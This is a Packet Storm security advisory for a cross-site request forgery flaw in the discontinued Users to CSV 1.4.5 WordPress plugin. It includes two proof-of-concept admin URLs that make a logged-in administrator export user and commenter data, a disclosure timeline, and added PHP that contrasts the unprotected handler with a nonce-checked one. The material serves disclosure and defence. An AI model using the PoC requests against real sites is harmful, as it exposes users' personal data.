WordPress Users To CSV 1.4.5 Cross Site Request Forgery

2015-06-15T00:00:00
ID PACKETSTORM:132318
Type packetstorm
Reporter Nitin Venkatesh
Modified 2015-06-15T00:00:00

Description

                                        
                                            `# Title: Cross-Site Request Forgery Vulnerability in Users to CSV Wordpress  
Plugin v1.4.5  
# Submitter: Nitin Venkatesh  
# Product: Users to CSV WordPress Plugin
# Product URL: https://wordpress.org/plugins/users-to-csv/ (disabled)  
# Plugin SVN URL: https://plugins.svn.wordpress.org/users-to-csv/ (active)  
# Vulnerability Type: Cross-site Request Forgery [CWE-352]  
# Affected Versions: v1.4.5 and possibly below.  
# Tested versions: v1.4.5  
# Fixed Version: None. Support for the plugin has been discontinued.
# CVE Status: None/Unassigned/Fresh  
  
## Product Information:  
  
This plugin adds an admin screen under "Users" with two options:
exporting the current users to a CSV file and exporting the unique
commenters on your blog to a CSV file.
  
## Vulnerability Description:  
  
The export is triggered by a plain GET request to users.php, with nothing tying the request to the administrator's own session, so a logged-in administrator can be made to export the user and commenter data via CSRF.
  
## Proof of Concept:  
  
http://localhost/wp-admin/users.php?page=users2csv.php&csv=true&table=users  
http://localhost/wp-admin/users.php?page=users2csv.php&csv=true&table=comments  
  
## Solution:  
  
Disable the plugin. Support for it has ceased.
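For readers maintaining similar export screens, an added example (not the plugin's own code, which this advisory does not reproduce) of the request pattern behind this finding beside the way a WordPress admin action is normally protected: the page issues a nonce with `wp_nonce_url()` and `check_admin_referer()` rejects any request that lacks it. The `u2c_*` function names are hypothetical.

```php
<?php
// Added illustration; not the Users to CSV plugin's code. The u2c_* functions
// are hypothetical and mirror the advisory's request shape:
// wp-admin/users.php?page=users2csv.php&csv=true&table=users|comments

// Weak pattern: a bare GET with csv=true is enough, so a cross-site request
// from any page the logged-in admin visits triggers the export (CSRF).
function u2c_weak_export() {
    if ( isset( $_GET['csv'] ) && 'true' === $_GET['csv'] ) {
        u2c_send_csv( sanitize_key( $_GET['table'] ?? 'users' ) );
    }
}

// Hardened pattern: the export runs only when the request carries a valid
// nonce for this action, issued to this user, and the user may list users.
function u2c_hardened_export() {
    if ( empty( $_GET['csv'] ) ) {
        return; // nothing requested; just render the screen
    }
    // Dies with 403 unless _wpnonce is present and valid for 'u2c_export'.
    check_admin_referer( 'u2c_export' );
    if ( ! current_user_can( 'list_users' ) ) {
        wp_die( 'Insufficient permissions', 403 );
    }
    $table = sanitize_key( $_GET['table'] ?? 'users' );
    if ( ! in_array( $table, array( 'users', 'comments' ), true ) ) {
        wp_die( 'Unknown export table', 400 );
    }
    u2c_send_csv( $table );
}

// The admin screen emits export links that carry a fresh nonce; a forged
// cross-site request cannot know it, so the plain PoC URL is rejected.
function u2c_render_screen() {
    $url = wp_nonce_url(
        admin_url( 'users.php?page=users2csv.php&csv=true&table=users' ),
        'u2c_export'
    );
    echo '<a href="' . esc_url( $url ) . '">Export users to CSV</a>';
}
function u2c_send_csv( $table ) {
    header( 'Content-Type: text/csv' );
    header( 'Content-Disposition: attachment; filename="' . $table . '.csv"' );
    $out = fopen( 'php://output', 'w' );
    foreach ( get_users() as $u ) { // users table only, for brevity
        fputcsv( $out, array( $u->ID, $u->user_login, $u->user_email ) );
    }
    fclose( $out );
    exit;
}
```

WordPress nonces are bound to the logged-in user and expire, and the capability check stays in place alongside them, so neither a forged cross-site request nor a lower-privileged user with their own nonce can trigger the export.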
  
## Disclosure Timeline:  
  
2015-06-08 - Discovered. Contacted developer.  
2015-06-08 - Developer responds that support for plugin has ceased.  
2015-06-13 - Noticed the plugin site has been disabled. It must have happened somewhere between 2015-06-09 and 2015-06-13. Contacted developer for re-confirmation.
2015-06-14 - Developer gives go-ahead for publishing a disclosure.  
2015-06-15 - Publishing disclosure on Full Disclosure mailing list.  
  
## Disclaimer:  
  
This disclosure is purely meant for educational purposes. I will in no way  
be responsible as to how the information in this disclosure is used.  
  